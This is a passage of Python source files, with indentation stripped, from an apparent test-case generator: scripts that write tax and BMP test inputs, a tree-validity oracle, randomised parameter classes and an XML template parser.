is_local[previous_lines[1].split(" ")[4][8:][:-1]] = tmp
if len(previous_lines) > 2:
previous_lines = previous_lines[1:]
previous_lines.append(line)
address.append(tmp_address)
income.append(tmp_income)
with open("./" + str(i) + "/test_case_" + str(j) + "/tax.csv", "w") as f:
f.write(str(nb_tax_payer) + "\n")
for k in range(nb_tax_payer):
tmp = ""
tmp += "1920;"
if disability_type[k] == "none":
tmp += "0.0;"
else:
tmp += "1.0;"
tmp += disability_type[k] + ";"
tmp += str(is_resident[k]) + "\n"
for add in address[k]:
tmp += country[add] + ";"
tmp = tmp[:-1] + "\n0\n"
p = []
e = []
o = []
for inc in income[k]:
if is_local[inc][0] == "P":
p.append(is_local[inc][1])
elif is_local[inc][0] == "E":
e.append(is_local[inc][1])
else:
o.append(is_local[inc][1])
tmp += str(len(p)) + "\n"
if len(p) > 0:
for isloc in p:
tmp += isloc + ";"
tmp = tmp[:-1] + "\n"
tmp += str(len(e)) + "\n"
if len(e) > 0:
for isloc in e:
tmp += isloc + ";"
tmp = tmp[:-1] + "\n"
tmp += str(len(o)) + "\n"
if len(o) > 0:
for isloc in o:
tmp += isloc + ";"
tmp = tmp[:-1] + "\n"
f.write(tmp)
```
#### File: XXX/bmp/analysis_bmp.py
```python
import sys
def extract_pixel(f):
r = int.from_bytes(f.read(1), "little")
g = int.from_bytes(f.read(1), "little")
b = int.from_bytes(f.read(1), "little")
if r != g or g != b:
gray_check = True
return r
def extract_padding(f, n):
padding = int.from_bytes(f.read(n), "little")
def return_interval(param, name):
#print(name + ": " + str(param))
if 0 <= param < 0.33:
return "True;False;False"
elif 0.33 <= param <= 0.67:
return "False;True;False"
elif 0.67 < param <= 1:
return "False;False;True"
else:
print("ERROR: invalid " + name)
exit()
def return_interval_array(param, name):
#print(name + ": " + str(param))
L = False
M = False
H = False
for p in param:
if 0 <= p < 0.33:
L = True
elif 0.33 <= p <= 0.67:
M = True
elif 0.67 < p <= 1:
H = True
else:
print("ERROR: invalid " + name)
exit()
return str(L) + ";" + str(M) + ";" + str(H)
def analyse_size():
return return_interval((img_w-10)/90, "size")
def analyse_gray():
tmp = []
for i in range(img_w):
for j in range(img_w):
tmp.append(pixel_array[i][j]/255)
return return_interval_array(tmp, "gray")
def analyse_padding():
tmp = (4-(3*img_w)%4)%4
if tmp == 0:
return "True;False;False;False"
elif tmp == 1:
return "False;True;False;False"
elif tmp == 2:
return "False;False;True;False"
else:
return "False;False;False;True"
def analyse_min_max():
min = 255
max = 0
for i in range(img_w):
for j in range(img_w):
tmp = pixel_array[i][j]
if tmp < min:
min = tmp
if tmp > max:
max = tmp
return return_interval(min/255, "min") + ";" + return_interval(max/255, "max")
def analyse_border():
tmp_H = []
tmp_V = []
for i in range(img_w):
tmp_H.append((pixel_array[i][-1] - pixel_array[i][0])/255)
tmp_V.append((pixel_array[-1][i] - pixel_array[0][i])/255)
return return_interval_array(tmp_H, "horizontal_border") + ";" + return_interval_array(tmp_V, "vertical_border")
def analyse_interval():
tmp_H = []
tmp_V = []
for i in range(img_w):
for j in range(i, img_w-1):
tmp_H.append((pixel_array[i][j+1] - pixel_array[i][j])/255)
tmp_V.append((pixel_array[j+1][i] - pixel_array[j][i])/255)
return return_interval_array(tmp_H, "horizontal_interval") + ";" + return_interval_array(tmp_V, "vertical_interval")
pixel_array = []
img_w = 0
with open(sys.argv[1] + "bmp.bmp", "rb") as f:
ID_field = f.read(2).decode("utf-8")
size = int.from_bytes(f.read(4), "little")
unused = int.from_bytes(f.read(4), "little")
offset = int.from_bytes(f.read(4), "little")
dib_header_size = int.from_bytes(f.read(4), "little")
img_w = int.from_bytes(f.read(4), "little")
img_h = int.from_bytes(f.read(4), "little")
nb_color_plane = int.from_bytes(f.read(2), "little")
bit_per_pixel = int.from_bytes(f.read(2), "little")
compression_method = int.from_bytes(f.read(4), "little")
data_size = int.from_bytes(f.read(4), "little")
print_resolution_w = int.from_bytes(f.read(4), "little")
print_resolution_h = int.from_bytes(f.read(4), "little")
nb_color = int.from_bytes(f.read(4), "little")
nb_important_color = int.from_bytes(f.read(4), "little")
for i in range(img_h):
tmp = []
for j in range(img_w):
tmp.append(extract_pixel(f))
pixel_array.append(tmp)
extract_padding(f, (4-(3*img_w)%4)%4)
with open(sys.argv[2] + "analysis.csv", "a") as f:
f.write(analyse_size() + ";"+ analyse_gray() + ";" + analyse_padding() + ";" + analyse_min_max() + ";" + analyse_border() + ";" + analyse_interval() + "\n")
```
#### File: bmp/debug/custom_bmp.py
```python
import numpy as np
def generate_size():
s = np.random.randint(5, 30)
print(s)
return s, s
def get_random_increment():
return np.random.randint(int(255/img_w))
def generate_pixels(w, h):
p = [0]*(w*h)
for i in range(h):
for j in range(w):
if i == 0 and j == 0:
p[i*w + j] = get_random_increment()
else:
if i == 0:
p[i*w + j] = min(p[i*w + j-1] + get_random_increment(), 255)
elif j ==0:
p[i*w + j] = min(p[(i-1)*w + j] + get_random_increment(), 255)
else:
p[i*w + j] = min(max(p[i*w + j-1], p[(i-1)*w + j]) + get_random_increment(), 255)
for i in range(h):
for j in range(w):
p[i*w + j] = tuple((p[i*w + j], p[i*w + j], p[i*w + j]))
return p
def add_pixel(f, p):
for i in p:
f.write(i.to_bytes(1, 'little'))
def add_padding(f, w):
p= (4-(3*w)%4)%4
for i in range(p):
f.write((0).to_bytes(1, 'little'))
def add_pixels(w, h, p):
with open("./bmp.bmp", "ab") as f:
for i in range(h):
for j in range(w):
add_pixel(f, p[h*i+j])
add_padding(f, w)
img_w, img_h = generate_size()
pixels = generate_pixels(img_w, img_h)
ID_field = "BM"
padding = img_h*((4-(img_w*3)%4)%4)
offset = 54
size = offset + img_w*img_h*3 + padding
dib_header_size = 40
nb_color_planes = 1
bit_per_pixel = 24
compression_method = 0
data_size = 16
print_resolution_w = 2835
print_resolution_h = 2835
nb_color = 0
nb_important_color = 0
#red_pixel = (0, 0, 255)
#white_pixel = (255, 255, 255)
#blue_pixel = (255, 0, 0)
#green_pixel = (0, 255, 0)
#black_pixel = (0, 0, 0)
with open("./bmp.bmp", "wb") as f:
f.write(bytes(ID_field, 'utf-8'))
f.write(size.to_bytes(4, 'little'))
#f.write((size-5-(4-(5*3)%2)).to_bytes(4, 'little'))
f.write((0).to_bytes(4, 'little'))
f.write((54).to_bytes(4, 'little'))
f.write(dib_header_size.to_bytes(4, 'little'))
f.write(img_w.to_bytes(4, 'little'))
f.write(img_h.to_bytes(4, 'little'))
f.write(nb_color_planes.to_bytes(2, 'little'))
f.write(bit_per_pixel.to_bytes(2, 'little'))
f.write(compression_method.to_bytes(4, 'little'))
f.write(data_size.to_bytes(4, 'little'))
f.write(print_resolution_w.to_bytes(4, 'little'))
f.write(print_resolution_h.to_bytes(4, 'little'))
f.write(nb_color.to_bytes(4, 'little'))
f.write(nb_important_color.to_bytes(4, 'little'))
add_pixels(img_w, img_h, pixels)
```
#### File: XXX/tree/oracle_tree.py
```python
import sys
MIN_N = 1
MAX_N = 50
nb_node_check = False
root_check = False
father_check = False
height_check = False
coherence_check = False
def compile_checkers_result():
res = nb_node_check
res = res or root_check
res = res or father_check
res = res or height_check
res = res or coherence_check
return res
def print_checkers_result():
print("nb_node_check: ", nb_node_check)
print("root_check: ", root_check)
print("father_check: ", father_check)
print("height_check: ", height_check)
print("coherence_check: ", coherence_check)
class Node():
def __init__(self, n, f, h):
self.nb = n
self.father = f
self.depth = h
self.children = []
def __repr__(self):
return "\n\n--- Node ---" +\
"\nnb: " + str(self.nb) +\
"\nfather: " + str(self.father) +\
"\ndepth: " + str(self.depth) +\
"\nchildren: " + str(self.children)
def read_csv():
with open(sys.argv[1] + "tree.csv", "r") as f:
for line in f:
tmp = line.split(";")
tmp[-1] = tmp[-1][:-1]
n = Node(int(tmp[0]), int(tmp[1]), int(tmp[2]))
for c in tmp[3:]:
n.children.append(int(c))
node.append(n)
def check_nb_node():
if not MIN_N <= len(node) <= MAX_N:
nb_node_check = True
def check_root():
if node[0].father != -1 or node[0].depth != 0:
root_check = True
def check_father():
for n in node[1:]:
if n.father >= len(node):
father_check = True
def check_height():
height = 0
for n in node:
if n.depth > height:
height = n.depth
if height >= len(node):
height_check = True
def check_coherence(i=0, counter=0, res=False):
for c in node[i].children:
if node[c].depth != node[i].depth+1:
coherence_check = True
counter += 1
retro_counter = check_coherence(c, counter, res)
counter += retro_counter
if i == 0:
if counter != len(node):
coherence_check = True
else:
return counter
node = []
read_csv()
check_nb_node()
check_root()
check_father()
check_height()
check_coherence()
#print_checkers_result()
with open(sys.argv[2] + "oracle", "a") as f:
f.write(str(compile_checkers_result()) + "\n")
```
#### File: XXX/src/Parameter.py
```python
import numpy as np
import Miscellaneous as misc
from Xxx import SETTINGS
from Element import Element
###############################################################################
# --- Parameter ------------------------------------------------------------- #
###############################################################################
class Parameter(Element):
"""
A Parameter object hold an array of variables and everything required to generate them
"""
counter = 0
def __init__(self, n, d, nb):
"""
:param n : name
:param d : depth
:param nb : nb_instances
"""
Element.__init__(self, n, d)
self.__check_nb_instances(nb)
self._nb_instances = nb
self._identifier = "var_" + str(Parameter.counter)
self._values = [None]*self._nb_instances
self._locks = [False]*self._nb_instances
self._nb_instances_lock = False
Parameter.counter += 1
def __check_nb_instances(self, nb):
if not 0 <= nb <= SETTINGS.get("parameter_max_nb_instances"):
misc.error("Parameter::__check_nb_instances() -> " + self._name + ": nb_instances parameter is out of range [0 ; " + str(SETTINGS.get("parameter_max_nb_instances")) + "]")
raise ValueError
def change_nb_instances(self, nb):
if not self._nb_instances_lock:
self.__check_nb_instances(nb)
while self._nb_instances > nb:
self._values.pop()
self._locks.pop()
self._nb_instances -= 1
while self._nb_instances < nb:
self._values.append(None)
self._locks.append(False)
self._nb_instances += 1
def lock_nb_instances(self):
self._nb_instances_lock = True
def lock_i(self, i):
self._locks[i] = True
def lock_all(self):
for i in range(self._nb_instances):
self.lock_i(i)
def unlock_nb_instances(self):
self._nb_instances_lock = False
def unlock_i(self, i):
self._locks[i] = False
def unlock_all(self):
for i in range(self._nb_instances):
self.unlock_i(i)
def reset_i(self, i):
if not self._locks[i]:
self._values[i] = None
def reset_all(self):
for i in range(self._nb_instances):
self.reset_i(i)
def _random_gen(self):
"""
Generate a parameter content according to the selected method
:return: the parameter content
"""
raise NotImplementedError
def set_value_i(self, i, val):
"""
Set the parameter i content according to val.
val can be "r" for random or a specific value.
The function will do nothing if the parameter is locked (locks[i] == True)
:param i : the parameter index
:param val : "r" or a specific value
:return : None
"""
raise NotImplementedError
def set_all_values(self, val):
for i in range(self._nb_instances):
self.set_value_i(i, val)
def duplicate(self):
"""
Create a new instance of the parameter with the same initial settings
:return: A parameter object
"""
raise NotImplementedError
def __repr__(self):
return "name: " + self._name +\
"\nidentifier: " +str(self._identifier) +\
"\ndepth: " + str(self._depth) +\
"\nnb_instances: " + str(self._nb_instances) +\
"\nvalues: " + str(self._values) +\
"\nlocks: " + str(self._locks)
def get_type(self):
raise NotImplementedError
def get_values(self):
return self._values
values = property(get_values)
def get_identifier(self):
return self._identifier
identifier = property(get_identifier)
def get_nb_instances_lock(self):
return self._nb_instances_lock
nb_instances_lock = property(get_nb_instances_lock)
def get_locks(self):
return self._locks
locks = property(get_locks)
def get_nb_instances(self):
return self._nb_instances
nb_instances = property(get_nb_instances)
###############################################################################
# --- Categorical-Parameter ------------------------------------------------- #
###############################################################################
class Categorical_Parameter(Parameter):
def __init__(self, n, d, v, w, nb):
"""
:param n : name
:param d : depth
:param v : values
:param w : weights
:param nb : nb_instances
"""
Parameter.__init__(self, n, d, nb)
self._check_values(v)
self._values_array = v
self.__check_weights(w)
self._weights_array = w
def _check_values(self, v):
raise NotImplementedError
def __check_weights(self, w):
if w:
if len(self._values_array) != len(w):
misc.error("Categorical_Parameter::__check_weights() -> " + self._name + ": values array size and weights array size must be equal")
raise ValueError
def _random_gen(self):
if self._weights_array:
return self._discrete_distribution_selection()
else:
return self._values_array[np.random.randint(0, len(self._values_array))]
def _discrete_distribution_selection(self):
r = round(np.random.randint(sum(self._weights_array)))
counter = 0
for i in range(len(self._weights_array)):
if counter <= r < (counter + self._weights_array[i]):
return self._values_array[i]
counter += self._weights_array[i]
def get_values_array(self):
return self._values_array
values_array = property(get_values_array)
def get_weights_array(self):
return self._weights_array
weights_array = property(get_weights_array)
def __repr__(self):
return Parameter.__repr__(self) +\
"\nvalues: " + str(self._values_array) +\
"\nweights: " + str(self._weights_array)
###############################################################################
# --- Boolean_Parameter ----------------------------------------------------- #
###############################################################################
class Boolean_Parameter(Categorical_Parameter):
def __init__(self, n, d, v, w, nb):
"""
:param n : name
:param d : depth
:param v : values
:param w : weights
:param nb : nb_instances
"""
Categorical_Parameter.__init__(self, n, d, v, w, nb)
def _check_values(self, v):
pass
def set_value_i(self, i, val):
if not self._locks[i]:
if val == 'r':
self._values[i] = self._random_gen()
elif val in [True, "True", 1, "1"]:
self._values[i] = True
elif val in [False, "False", 0, "O"]:
self._values[i] = False
else:
misc.error("Boolean_Parameter::set_value_i() -> " + self._name + ": unknow value parameter \"" + val + "\"")
raise ValueError
def duplicate(self):
return Boolean_Parameter(self._name, self._depth, self._values_array, self._weights_array, self._nb_instances)
def get_type(self):
return "boolean"
def __repr__(self):
return misc.color("--- Boolean_Parameter ---", "yellow") + "\n" + Categorical_Parameter.__repr__(self)
###############################################################################
# --- String_Parameter ------------------------------------------------------ #
###############################################################################
class String_Parameter(Categorical_Parameter):
def __init__(self, n, d, v, w, nb):
"""
:param n : name
:param d : depth
:param v : an array that contains all possible values as a string
:param w : an array (int) that contains a weight corresponding to the associated value
:param nb : nb_instances
"""
Categorical_Parameter.__init__(self, n, d, v, w, nb)
def _check_values(self, v):
if not 1 <= len(v) <= SETTINGS.get("string_parameter_max_size"):
misc.error("Categorical_Parameter::__check_values() -> " + self._name + ": values array size is out of range [1 ;" + str(SETTINGS.get("string_parameter_max_size")) + "]")
raise ValueError
def set_value_i(self, i, val):
if not self._locks[i]:
if val == "r":
self._values[i] = self._random_gen()
elif val == "first":
self._values[i] = self._values_array[0]
elif val == "last":
self._values[i] = self._values_array[-1]
elif val == "wmin":
self._values[i] = self.__get_wmin()
elif val == "wmax":
self._values[i] = self.__get_wmax()
elif val in self._values_array:
self._values[i] = val
else:
misc.error("String_Parameter::set_value_i() -> " + self._name + ": invalid parameter: " + str(self._values_array))
raise NameError
def __get_wmin(self):
wmin = 999
wmin_index = 0
for w, i in enumerate(self._weights_array):
if w < wmin:
wmin = w
wmin_index = i
return self._values_array[wmin_index]
def __get_wmax(self):
wmax = 0
wmax_index = 0
for w, i in enumerate(self._weights_array):
if w > wmax:
wmax = w
wmax_index = i
return self._values_array[wmax_index]
def duplicate(self):
return String_Parameter(self._name, self._depth, self._values_array, self._weights_array, self._nb_instances)
def get_type(self):
return "string"
def __repr__(self):
return misc.color("--- String_Parameter ---", "yellow") + "\n" + Categorical_Parameter.__repr__(self)
###############################################################################
# --- Numerical_Parameter --------------------------------------------------- #
###############################################################################
class Numerical_Parameter(Parameter):
def __init__(self, n, d, m, M, dis, mea, var, r, w, nb):
"""
:param n : name
:param d : depth
:param m : min value
:param M : max value
:param dis : distribution -> "u" for a uniform | "n" for a normal | i for an interval
:param mea : mean
:param var : variance
:param r : ranges
:param w : weights
:param nb : nb_instances
"""
Parameter.__init__(self, n, d, nb)
self._min = m
self._max = M
self._check_min_max_order()
self._mean = None
self._variance = None
self._ranges = None
self._intervals = None
self.__check_distribution(dis)
self._distribution = dis
self.__set_mean_and_variance(mea, var)
self.__check_ranges(r)
self._ranges = r
self.__set_intervals(r, w)
def __check_distribution(self, dis):
if dis not in ["u", "n", "i"]:
misc.error("Numerical_Parameter::__check_distribution() -> " + self._name + ": invalid distribution [\"u\", \"n\" ,\"i\"]")
raise NameError
def _check_min_max_order(self):
if self._min > self._max:
misc.error("Numerical_Parameter::__check_min_max_order() -> " + self._name + ": max value should be greater than min value")
raise ValueError
def _check_value(self, val):
if not self._min <= val <= self._max:
misc.error("Numerical_Parameter::_check_value() -> " + self._name + ": value parameter out of range[" + str(self._min) + ";" + str(self._max) + "]")
raise ValueError
def __check_ranges(self, ranges):
if ranges:
for r in ranges:
for i in range(2):
if not self._min <= r[i] <= self._max:
misc.error("Numerical_Parameter::_check_ranges() -> " + self._name + ": invalid range value [" + str(self._min) + ";" + str(self._max) + "]")
raise ValueError
if r[1] < r[0]:
misc.error("Numerical_Parameter::_check_ranges() -> " + self._name + ": invalid range value [" + str(self._min) + ";" + str(self._max) + "]")
raise ValueError
def __set_mean_and_variance(self, mea, var):
if mea is None and var is None:
self._mean = round((self._max + self._min)/2.0, 5)
self._variance = round((self._max - self._min)/4.0, 5)
else:
if not self._min <= mea <= self._max:
misc.error("Numerical_Parameter::__set_mean_and_variance() -> " + self._name + ": mean value must be between min and max")
raise ValueError
self._mean = round(mea, 5)
if var < 0:
misc.error("Numerical_Parameter::__set_mean_and_variance() -> " + self._name + ": variance value must be positive or null")
raise ValueError
self._variance = round(var, 5)
def __set_intervals(self, r, w):
if r:
v = []
for i in range(len(r)):
v.append(str(i))
self._intervals = String_Parameter("interval", -1, v, w, 1)
def _random_gen(self):
if self._distribution == "u":
val = (self._max - self._min)*np.random.rand() + self._min
elif self._distribution == "n":
if self._variance == 0:
val = self._mean
else:
val = np.random.normal(self._mean, self._variance, 1)[0]
while not self._min <= val <= self._max:
val = np.random.normal(self._mean, self._variance, 1)[0]
else:
self._intervals.set_value_i(0, "r")
index = int(self._intervals.values[0])
val = (self._ranges[index][1] - self._ranges[index][0])*np.random.rand() + self._ranges[index][0]
return val
def set_value_i(self, i, val):
if val == "r":
self._values[i] = self._random_gen()
return True
elif val == "min":
self._values[i] = self._min
return True
elif val == "max":
self._values[i] = self._max
return True
elif val == "mean":
self._values[i] = self._mean
return True
else:
return False
def __repr__(self):
return Parameter.__repr__(self) +\
"\nmin: " + str(self._min) +\
"\nmax: " + str(self._max) +\
"\ngenerator: " + str(self._distribution) +\
"\nmean: " + str(self._mean) +\
"\nvariance: " + str(self._variance) +\
"\nranges: " + str(self._ranges) + \
"\nweights: " + str(self.get_weights())
def get_m(self):
return self._min
m = property(get_m)
def get_M(self):
return self._max
M = property(get_M)
def get_distribution(self):
return self._distribution
distribution = property(get_distribution)
def get_mean(self):
return self._mean
mean = property(get_mean)
def get_variance(self):
return self._variance
variance = property(get_variance)
def get_ranges(self):
return self._ranges
ranges = property(get_ranges)
def get_weights(self):
w = []
if self._intervals:
w = self._intervals.weights_array
return w
weights = property(get_weights)
###############################################################################
# --- Integer_Parameter ----------------------------------------------------- #
###############################################################################
class Integer_Parameter(Numerical_Parameter):
def __init__(self, n, d, m, M, dis, mea, var, r, w, nb):
"""
:param n : name
:param d : depth
:param m : min value
:param M : max value
:param dis : distribution -> "u" for a uniform | "n" for a normal | i for an interval
:param mea : mean
:param var : variance
:param r : ranges
:param w : weights
:param nb : nb_instances
"""
Numerical_Parameter.__init__(self, n, d, m, M, dis, mea, var, r, w, nb)
def _random_gen(self):
return int(round(super(Integer_Parameter, self)._random_gen(), 0))
def set_value_i(self, i, val):
if not self._locks[i] and not super(Integer_Parameter, self).set_value_i(i, val):
if misc.check_integer(val):
val = int(val)
self._check_value(val)
self._values[i] = val
else:
misc.error("Integer_Parameter::set_value_i() -> " + self._name + ": string value parameter unknown")
raise NameError
def duplicate(self):
return Integer_Parameter(self._name, self._depth, self._min, self._max, self._distribution, self._mean, self._variance, self._ranges, self.get_weights(), self._nb_instances)
def reduce_interval(self, m):
if self._min <= m <= self._max:
self._min = m
elif m > self._max:
misc.error("Integer_Parameter::reduce_interval() -> " + self._name + ": new minimal number of instances is out of range")
raise ValueError
def get_type(self):
return "integer"
def __repr__(self):
return misc.color("--- Integer_Parameter ---", "yellow") + "\n" + Numerical_Parameter.__repr__(self)
###############################################################################
# --- Real_Parameter -------------------------------------------------------- #
###############################################################################
class Real_Parameter(Numerical_Parameter):
def __init__(self, n, d, m, M, dis, mea, var, r, w, nb):
"""
:param n : name
:param d : depth
:param m : min value
:param M : max value
:param dis : distribution -> "u" for a uniform | "n" for a normal | i for an interval
:param mea : mean
:param var : variance
:param r : ranges
:param w : weights
:param nb : nb_instances
"""
Numerical_Parameter.__init__(self, n, d, m, M, dis, mea, var, r, w, nb)
def _random_gen(self):
return round(super(Real_Parameter, self)._random_gen(), 5)
def set_value_i(self, i, val):
if not self._locks[i] and not super(Real_Parameter, self).set_value_i(i, val):
if misc.check_number(val):
val = round(float(val), 5)
self._check_value(val)
self._values[i] = val
else:
misc.error("Real_Parameter::set_value_i() -> " + self._name + ": string value parameter unknown")
raise NameError
def duplicate(self):
return Real_Parameter(self._name, self._depth, self._min, self._max, self._distribution, self._mean, self._variance, self._ranges, self.get_weights(), self._nb_instances)
def get_type(self):
return "real"
def __repr__(self):
return misc.color("--- Real_Parameter ---", "yellow") + "\n" + Numerical_Parameter.__repr__(self)
```
#### File: XXX/src/Xml.py
```python
import xml.etree.ElementTree as ET
import Miscellaneous as misc
from Node import Node
from Parameter import Boolean_Parameter, String_Parameter, Integer_Parameter, Real_Parameter
from Constraint import Constraint
def parse_xml(path):
try:
tree = ET.parse(path)
return tree.getroot()
except ET.ParseError:
misc.error("Xml::parse_xml() -> the template \"" + path + "\" does not respect xml format")
return None
def read_template(path):
root_xml = parse_xml(path)
if root_xml is None:
raise ValueError
if root_xml.tag != "root":
misc.error("Xml::read_xml() -> the template root tag must be \"root\"" + path + "\"")
raise ValueError
name = check_attribute(root_xml, "name", True)
nb_instances = Integer_Parameter(name + "_nb_instances", -1, 1, 1, "u", None, None, None, None, 1)
nb_instances.set_value_i(0, 1)
nb_instances.lock_i(0)
root_node = Node(name, 0, None, None, nb_instances)
read_node(root_xml, root_node)
return root_node
def read_node(node_xml, node, d=0):
for child in node_xml:
name = check_attribute(child, "name", True)
if child.tag == "parameter":
node.add_parameter(build_parameter(name, d, child))
elif child.tag == "constraint":
node.add_constraint(build_constraint(name, d, node, child))
elif child.tag == "node":
node.add_child(build_node(name, d+1, node, child))
read_node(child, node.get_child_n(name), d+1)
else:
misc.error("Xml::read_node() -> \"" + child.tag + "\" unknown xml tag")
raise NameError
def build_node(n, d, p, node_xml):
minimum = check_attribute(node_xml, "min")
maximum = check_attribute(node_xml, "max")
nb = check_attribute(node_xml, "nb_instances")
if nb and check_nb_instances(nb):
nb = int(nb)
if minimum is not None or maximum is not None:
misc.error("Xml::build_node() -> \"" + n + "\" min and max should not be specified along with nb_instances attribute")
raise ValueError
node_xml.attrib["min"] = nb
node_xml.attrib["max"] = nb
nb_instances = build_integer_parameter(n + "_nb_instances", d-1, node_xml, 1)
nb_instances.set_value_i(0, nb)
nb_instances.lock_i(0)
elif minimum is not None or maximum is not None:
if minimum is None and maximum is not None:
misc.error("Xml::build_node() -> \"" + n + "\" missing min attribute")
raise ValueError
elif maximum is None and minimum is not None:
misc.error("Xml::build_node() -> \"" + n + "\" missing max attribute")
raise ValueError
nb_instances = build_integer_parameter(n + "_nb_instances", d-1, node_xml, 1)
if nb_instances.m < 0:
misc.error("Xml::build_node() -> \"" + n + "\" min and max attributes must be positive integers")
raise ValueError
else: #not nb_instances and not minimum and not maximum
node_xml.attrib["min"] = "1"
node_xml.attrib["max"] = "1"
nb_instances = build_integer_parameter(n + "_nb_instances", d-1, node_xml, 1)
nb_instances.set_value_i(0, 1)
nb_instances.lock_i(0)
return Node(n, d, p, None, nb_instances)
def build_parameter(n, d, node_xml):
parameter_type = check_attribute(node_xml, "type", True)
nbi = check_attribute(node_xml, "nb_instances")
to_lock = False
if nbi and check_nb_instances(nbi):
nbi = int(nbi)
to_lock = True
else:
nbi = 1
if parameter_type == "boolean":
p = build_boolean_parameter(n, d, node_xml, nbi)
elif parameter_type == "string":
p = build_string_parameter(n, d, node_xml, nbi)
elif parameter_type == "integer":
p = build_integer_parameter(n, d, node_xml, nbi)
elif parameter_type == "real":
p = build_real_parameter(n, d, node_xml, nbi)
else:
misc.error("Xml::build_parameter() -> \"" + parameter_type + "\" unknown parameter type")
raise NameError
if to_lock:
p.lock_nb_instances()
return p
def build_categorical_parameter(node_xml):
values = []
tmp = check_attribute(node_xml, "values", False)
if tmp:
tmp = tmp.split(";")
for v in tmp:
values.append(misc.remove_starting_and_ending_space(v))
else:
values = [True, False]
return values, build_weights(check_attribute(node_xml, "weights", False))
def build_weights(str_weights):
weights = []
if str_weights:
str_weights = str_weights.split(";")
for w in str_weights:
w = misc.remove_starting_and_ending_space(w)
if misc.check_integer(w, True):
w = int(w)
if w >= 0:
weights.append(int(w))
else:
misc.error("Xml::build_weights() -> weight must be positive or null")
if sum(weights) == 0:
misc.error("Xml::build_weights() -> at least one weight must be positive")
raise ValueError
return weights
def build_boolean_parameter(n, d, node_xml, nbi):
values, weights = build_categorical_parameter(node_xml)
if len(values) != 2:
misc.error("Xml::build_boolean_parameter() -> wrong boolean parameter values")
raise ValueError
for i in range(2):
if values[i] in [True, "True", "true", 1]:
values[i] = True
elif values[i] in [False, "False", "false", "0"]:
values[i] = False
else:
misc.error("Xml::build_boolean_parameter() -> wrong boolean parameter values")
raise ValueError
return Boolean_Parameter(n, d, values, weights, nbi)
def build_string_parameter(n, d, node_xml, nbi):
values, weights = build_categorical_parameter(node_xml)
return String_Parameter(n, d, values, weights, nbi)
def build_numerical_parameter(node_xml):
minimum = check_attribute(node_xml, "min", True)
maximum = check_attribute(node_xml, "max", True)
distribution = check_attribute(node_xml, "distribution")
mean = check_attribute(node_xml, "mean", False)
variance = check_attribute(node_xml, "variance", False)
ranges = []
if not distribution:
distribution = "u"
if mean and misc.check_number(mean, True):
mean = float(mean)
else:
mean = None
if variance and misc.check_number(variance, True):
variance = float(variance)
else:
variance = None
if ranges:
pass
tmp = check_attribute(node_xml, "ranges", False)
if tmp:
tmp = tmp.split(";")
for r in tmp:
r = misc.remove_starting_and_ending_space(r)
r = r[1:-1].split(",")
if len(r) != 2:
misc.error("Xml::build_numerical_parameter() -> invalid ranges")
raise ValueError
for i in range(2):
r[i] = misc.remove_starting_and_ending_space(r[i])
ranges.append((r[0], r[1]))
return minimum, maximum, distribution, mean, variance, ranges, build_weights(check_attribute(node_xml, "weights", False))
def build_integer_parameter(n, d, node_xml, nbi):
minimum, maximum, distribution, mean, variance, str_ranges, weights = build_numerical_parameter(node_xml)
misc.check_integer(minimum, True)
minimum = int(minimum)
misc.check_integer(maximum, True)
maximum = int(maximum)
ranges = []
for r in str_ranges:
if misc.check_integer(r[0], True) and misc.check_integer(r[1], True):
ranges.append((int(r[0]), int(r[1])))
return Integer_Parameter(n, d, minimum, maximum, distribution, mean, variance, ranges, weights, nbi)
def build_real_parameter(n, d, node_xml, nbi):
minimum, maximum, distribution, mean, variance, str_ranges, weights = build_numerical_parameter(node_xml)
misc.check_number(minimum, True)
minimum = float(minimum)
misc.check_number(maximum, True)
maximum = float(maximum)
ranges = []
for r in str_ranges:
if misc.check_number(r[0], True) and misc.check_number(r[1], True):
ranges.append((float(r[0]), float(r[1])))
return Real_Parameter(n, d, minimum, maximum, distribution, mean, variance, ranges, weights, nbi)
def build_constraint(n, d, node, node_xml):
expressions = []
raw_expressions = check_attribute(node_xml, "expressions", True)
raw_expressions = raw_expressions.split(";")
for e in raw_expressions:
expressions.append(misc.remove_starting_and_ending_space(e))
types = []
raw_constraint_types = check_attribute(node_xml, "types", False)
if raw_constraint_types is not None:
raw_constraint_types = raw_constraint_types.split(";")
for c in raw_constraint_types:
c = misc.remove_starting_and_ending_space(c)
if c in ["forall", "exist", "unique"]:
types.append(c)
else:
misc.error("Xml::__build_constraint() -> unknown constraint type \"" + c + "\"")
raise NameError
quantifiers = []
raw_quantifiers = check_attribute(node_xml, "quantifiers", False)
if raw_quantifiers is not None:
raw_quantifiers = raw_quantifiers.split(";")
for l in raw_quantifiers:
l = misc.remove_starting_and_ending_space(l)
if misc.check_letter(l, True):
quantifiers.append(l)
ranges = []
raw_ranges = check_attribute(node_xml, "ranges", False)
if raw_ranges is not None:
raw_ranges = raw_ranges.split(";")
for r in raw_ranges:
r = misc.remove_starting_and_ending_space(r)
if r == "all":
ranges.append(r)
elif r[0] is "[" and r[-1] is "]":
boundaries = r[1:-1].split(",")
if len(boundaries) != 2:
misc.error("Xml::build_constraint() -> wrong ranges syntax")
raise ValueError
ranges.append((misc.remove_starting_and_ending_space(boundaries[0]), misc.remove_starting_and_ending_space(boundaries[1])))
else:
misc.error("Xml::build_constraint() -> wrong ranges syntax")
raise ValueError
if len(quantifiers) != len(ranges) or len(quantifiers) != len(types):
misc.error("Xml::build_constraint() -> the number of quantifiers must equal the number of ranges and types")
raise ValueError
return Constraint(n, d, node, expressions, types, quantifiers, ranges)
def check_nb_instances(nb):
misc.check_integer(nb, True)
if int(nb) >= 0:
return True
else:
misc.error("Xml::check_nb_instances() -> nb_instances must be a positive integer value")
raise ValueError
def check_attribute(node_xml, att, err=False):
if att in node_xml.attrib:
return node_xml.attrib[att]
else:
if err:
misc.error("Xml::check_attribute() -> \"" + att + "\" attribute is missing")
raise NameError
else:
return None
def write_test_case(root_node, seed, path):
with open(path, "w") as f:
f.write("<?xml version=\"1.0\"?>\n\n")
f.write(write_root_node(root_node, seed))
def write_root_node(root_node, seed):
s = "<root name=\"" + root_node.name + "\">\n"
s +="\t<seed value =\"" + seed + "\"/>\n"
current_container = root_node.get_container_i(0)
s += write_data(current_container)
s += "</root>"
return s
def write_node(node, tab):
s = ""
for i in range(node.nb_instances):
s += tab + "<node name=\"" + node.name + "\" instance=\"" + str(i) + "/" + str(node.nb_instances - 1) + "\">\n"
current_container = node.get_container_i(i)
s += write_data(current_container, tab)
s += tab + "</node>\n"
return s
def write_data(current_container, tab=""):
s = ""
for p in current_container.parameters:
